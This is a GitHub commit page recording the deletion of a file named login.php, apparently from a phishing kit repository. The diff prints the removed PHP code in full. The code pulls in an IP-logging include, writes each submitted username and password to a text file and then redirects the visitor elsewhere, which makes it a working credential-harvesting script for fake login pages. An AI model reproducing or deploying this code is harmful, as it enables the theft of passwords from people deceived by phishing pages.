Delete login.php

This commit is contained in:
Usama Abdul Sattar 2019-06-15 10:53:21 +05:00 committed by GitHub
parent 61cba860fc
commit 67438d5f05
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -1,6 +0,0 @@
<?php
include 'ip.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: <CUSTOM>');
exit();